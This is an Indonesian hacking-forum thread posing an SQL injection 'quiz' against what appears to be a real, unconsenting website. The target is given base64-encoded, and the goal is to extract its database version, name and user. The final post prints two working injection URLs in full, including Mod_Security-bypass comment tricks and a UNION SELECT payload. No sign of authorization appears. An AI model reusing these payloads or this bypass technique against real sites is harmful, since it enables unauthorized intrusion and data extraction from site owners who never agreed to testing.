> > > >


[Info] [KUIS] SQLi ByPass Mod_Security
Track-R$ Offline
[learn and share]
14 - 188
#1
04-22-2014, 07:22 PM
maaf sebelumnya kalo kata-kata di thread ini sedikit mirip dengan thread KUIS SQLinya om @wine trochanter kalo salah room atau melanggar rules sialahkan di remove aja yak om admin dan momod :-bd.
Selamat sore teman" dan rekan" IBTeam Big Grin sudah lama nih ngk buat thread.. dan kebetulan tadi pas jalan-jalan di forum tercinta ini ketemu deh ama thread nya om @wine trochanter disini tentang Bypass Mod_Security jadi kepingin coba-coba tentang SQLi.
Nah kebetulan tadi ada ketemu dengan salah satu sites yang vuln sqli temen" dan untuk pembelajaran kita buat kuis aja yak biar rame :-bd.
Oke ngk usah panjang lebar deh langsung aja di coba yak.

target ::
Code:
aHR0cDovL3d3dy5jb21wcm91c2EuY29tL2VuL25ld3Nfdmlldy5waHA/aWQ9OA==

goals ::
Code:
print mysql version, database, user dan nick forum kamu

rules ::
Code:
-- Post Screen Shot di komentar dan pastikan tidak ada query yg terlihat
-- Pm query kamu

NOTE ::
Quote:INGAT, thread ini saya buat bukanlah untuk membuktikan siapa yang paling jago dan paling hebat, tapi untuk lebih dan mengasah tehnik-tehnik kita dalam memecahkan sebuah masalah.

Spoiler! :

[Image: Screenshot_8_zps7d69e066.png]

thanks for ALL and Happy InjecT \m/
[Correct Me If I Worng]
 
Find
Reply

wine trochanter Offline
Coder
141 - 929
#2
04-22-2014, 07:39 PM
thx pak
Spoiler! :
[Image: GS9Xf5J.png]
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix
 
Find
Reply

G_26 Offline

5 - 34
#3
04-22-2014, 09:25 PM

[Image: 1a28f849e3b91d941a5bc0514a35c550.png]

Makasih Om:-bd
 
Website Find
Reply

Track-R$ Offline
[learn and share]
14 - 188
#4
05-01-2014, 05:41 PM
thx for solver @wine trochanter and @G_26
oke berikut query untuk penyelesaiaan chalenge di atas ::

query om @wine trochanter
Spoiler! :
Code:
http://www.comprousa.com/en/news_view.php?id=8%20div%200/*!50000union+select*/%201,/*!50000concat*/%280x3c666f6e7420666163653d636f75726965722073697a653d333e77696e6520756e7975203a2a20,version%28%29,0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user%28%29,0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database%28%29,0x3c2f74643e3c2f74723e3c2f7461626c653e,%22%3Cimg%20src=%27http://3.bp.blogspot.com/_66th7CKc3S8/TMYv5Jst5qI/AAAAAAAAADA/PQ08tJnpVNw/s1600/love_graphics_33.gif%27%3E%22%29,3,4--

query om @G_26
Spoiler! :
Code:
http://www.comprousa.com/en/news_view.php?id=-8+UNION(SELECT(1),(concat/**/(('<font face=courier>G_26 ::: '),(version()),('<br>Database and User ::: '),(database()),(' // '),(user()))),(0),(4))-- -

[Correct Me If I Worng]
 
Find
Reply






Users browsing this thread: 1 Guest(s)